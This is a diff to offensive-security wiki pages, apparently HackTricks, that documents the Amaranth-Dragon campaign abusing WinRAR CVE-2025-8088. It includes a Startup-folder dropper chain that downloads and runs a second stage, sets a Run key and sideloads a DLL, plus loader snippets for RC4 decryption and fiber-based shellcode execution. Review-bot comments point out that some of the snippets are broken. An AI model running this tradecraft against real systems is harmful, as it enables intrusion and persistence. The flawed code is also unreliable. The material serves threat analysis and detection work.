9 changes: 9 additions & 0 deletions src/generic-hacking/archive-extraction-path-traversal.md
Expand Up @@ -42,6 +42,14 @@ Options used:

Deliver `evil.rar` to the victim and instruct them to extract it with a vulnerable WinRAR build.

### Weaponised Startup persistence (Amaranth-Dragon)

* Spearphish RAR lures weaponised CVE-2025-8088 to **iterate multiple traversal depths** until the payload lands in the correct Startup folder regardless of where the victim extracts the archive.
* The dropped file is a **`.cmd`/`.bat`** that runs at next logon and typically:
* Downloads a password-protected second-stage RAR from a trusted domain (e.g., Dropbox/actor CDN).
* Extracts a **signed EXE + malicious DLL** pair into `C:\Users\Public\Documents\<folder>\`, then sets a **HKCU Run** value and executes the EXE to sideload the DLL.
* Sandboxes that only unpack the outer archive may **miss the Startup-written script entirely**, so archive statics can appear benign while the persistent script is absent from the analysis artifacts.

### Observed Exploitation in the Wild

ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached RAR archives abusing CVE-2025-8088 to deploy customised backdoors and facilitate ransomware operations.
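Review bot: the "Downloads…" and "Extracts…" bullets are sub-steps of the `.cmd`/`.bat` bullet but sit at the same indentation level, so they render as siblings; indent them under "The dropped file is a…" and keep the sandbox caveat as its own top-level point. That caveat is also the defensive takeaway of the section: only analysis that extracts the archive on a vulnerable build, or that parses the RAR entry names for traversal sequences, ever sees the Startup write, so state that explicitly rather than leaving it implied, and add an inline link to the Check Point report these details come from so each claim is traceable.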
Expand Down Expand Up @@ -97,5 +105,6 @@ ESET reported RomCom (Storm-0978/UNC2596) spear-phishing campaigns that attached

- [Trend Micro ZDI-25-949 – 7-Zip symlink ZIP traversal (CVE-2025-11001)](https://www.zerodayinitiative.com/advisories/ZDI-25-949/)
- [JFrog Research – mholt/archiver Zip-Slip (CVE-2025-3445)](https://research.jfrog.com/vulnerabilities/archiver-zip-slip/)
- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)

{{#include ../banners/hacktricks-training.md}}
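Review bot: the new entry matches the existing "Vendor – Title" reference style, but nothing in the body links to it; since the new "Weaponised Startup persistence" section is sourced from this report, add an inline citation there rather than relying on the reference list alone.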
Expand Up @@ -491,6 +491,28 @@ Tradecraft notes:
* Because the executable stays trusted, most allowlisting controls only need your malicious DLL to sit alongside it. Focus on customizing the loader DLL; the signed parent can typically run untouched.
* ShadowPad’s decryptor expects the TMP blob to live next to the loader and be writable so it can zero the file after mapping. Keep the directory writable until the payload loads; once in memory the TMP file can safely be deleted for OPSEC.

## Amaranth Loader / TGAmaranth sideloading pattern

* Delivery: password-protected RAR/ZIP drops a **signed EXE + malicious DLL** together; the EXE looks for a dependency name (`DllSafeCheck64.dll`, `libcef.dll`, etc.) and executes attacker code from the same folder.
* Exports: only **one export contains logic**; all other exports point to a stub that immediately `Sleep(INFINITE)` to confuse static/automated triage.
* Decryption chain: strings/URLs are XOR-decoded at runtime, then the loader fetches an **AES key from a first URL (Pastebin or actor infra, often geo-fenced)** and an **encrypted payload from a second URL**, decrypts with **AES-CBC** using a constant IV `12 34 56 78 90 AB CD EF 34 56 78 90 AB CD EF 12`, allocates `PAGE_EXECUTE_READWRITE`, and runs the shellcode (commonly Havoc).
* Variants swap Pastebin for Cloudflare-fronted hosts that reply `403` to non-target IPs, and rotate benign-looking **User-Agents** when calling `InternetOpenA`.
* A later variant decrypts a local shellcode blob with a **non-standard RC4 PRGA** (output byte = `(s[i]+s[j])&0xff` instead of `box[box[i]+box[j]]`), then executes inside a **fiber context** to alter the call stack:
```python
def prga(box):
j=0
for i in range(len(data)):
ii=(i+1)&0xff; j=(j+box[ii])&0xff
box[ii], box[j] = box[j], box[ii]
yield (box[ii]+box[j]) & 0xff
```
```c
ConvertThreadToFiber(NULL);
LPVOID f = CreateFiber(0, shellcode, NULL);
SwitchToFiber(f);
```
* The TGAmaranth RAT (sideloaded by the same pattern) decrypts a Telegram bot token with the XOR routine, performs **self-debugging via `DebugActiveProcess`** to detect analysts, and **unhooks `ntdll.dll`** by copying a clean `.text` section from a suspended `cmd.exe` into its own process before running commands.

## References

- [CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe](https://trustedsec.com/blog/cve-2025-1729-privilege-escalation-using-tpqmassistant-exe)
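Review bot: `prga()` reads `len(data)` but `data` is never defined, so the snippet raises `NameError` as written; take the length as a parameter (`def prga(box, n):` with `for i in range(n):`) or make it an unbounded generator the caller zips against the ciphertext. The standard-RC4 description `box[box[i]+box[j]]` also drops the modulus; write it as `box[(box[i]+box[j]) & 0xff]` so the contrast with the variant's `(box[i]+box[j]) & 0xff` output is exact. Formatting: both fences sit inside the bullet list without indentation, which breaks the list in mdBook; indent them under the RC4 bullet. Finally, the constant IV, the stub exports that `Sleep(INFINITE)`, and the `DebugActiveProcess` self-attach are the durable detection artifacts in this section and deserve an inline citation to the Check Point report rather than only the entry appended to the reference list.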
Expand All @@ -503,6 +525,7 @@ Tradecraft notes:
- [Sysinternals Process Monitor](https://learn.microsoft.com/sysinternals/downloads/procmon)
- [Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT](https://unit42.paloaltonetworks.com/impersonation-campaigns-deliver-gh0st-rat/)
- [Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation](https://research.checkpoint.com/2025/ink-dragons-relay-network-and-offensive-operation/)
- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)


{{#include ../../../banners/hacktricks-training.md}}
{{#include ../../../banners/hacktricks-training.md}}
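Review bot: the banner include `{{#include ../../../banners/hacktricks-training.md}}` appears twice at the end of the file; this is unchanged context rather than part of this change, but drop the duplicate while the file is being touched. The added reference follows the existing "Vendor – Title" style of the entries above it.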
Expand Up @@ -48,6 +48,20 @@ Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup"
../../generic-hacking/archive-extraction-path-traversal.md
{{#endref}}

### Startup dropper chain example (CVE-2025-8088)

A practical abuse seen in 2025 campaigns:

```cmd
# dropped .cmd inside Startup via path traversal
powershell -w hidden (New-Object Net.WebClient).DownloadFile(`RAR_URL`, %TEMP%\u.rar)
rar.exe x -hp`pass` %TEMP%\u.rar C:\Users\Public\Documents\Microsoft\winupdate_v%RANDOM%%TIME:~3,2%\
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v `rand` /d `exe_path`
start "" `exe_path` # signed host sideloads malicious DLL
```

Even if the victim only unpacks the archive, the auto-started script will fetch the second stage on reboot/logon, install a Run key, and execute the signed binary that sideloads the attacker DLL.



## Registry
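Review bot: the block is tagged `cmd` but is not valid batch: `#` is not a comment marker in cmd, so the first line and the trailing `# signed host sideloads malicious DLL` on the `start` line would be interpreted as commands or arguments, and the backtick placeholders (`RAR_URL`, `pass`, `rand`, `exe_path`) read as literal characters. Either label the block as pseudocode reconstructed from the report or use `<RAR_URL>`-style placeholders and drop the language tag. "A practical abuse seen in 2025 campaigns" needs the inline citation to the Check Point report, and the closing paragraph should name the detection points the chain exposes: a new script in the per-user Startup folder written by the archiver process, and the `HKCU\...\Run` value it later adds, both of which the `autorunsc.exe` enumeration later on this page surfaces. The three blank lines before `## Registry` are also stray.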
Expand Down Expand Up @@ -346,6 +360,7 @@ autorunsc.exe -m -nobanner -a * -ct /accepteula
- [https://attack.mitre.org/techniques/T1547/001/](https://attack.mitre.org/techniques/T1547/001/)
- [https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\&seqNum=2](https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2)
- [https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell](https://www.itprotoday.com/cloud-computing/how-can-i-add-boot-option-starts-alternate-shell)
- [Check Point Research – Amaranth-Dragon weaponises CVE-2025-8088 for targeted espionage](https://research.checkpoint.com/2026/amaranth-dragon-weaponizes-cve-2025-8088-for-targeted-espionage/)



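Review bot: the added reference uses the "Vendor – Title" style while the three entries above it are bare URLs; either works, but keep the list consistent within this file. The trailing blank lines after the list are stray.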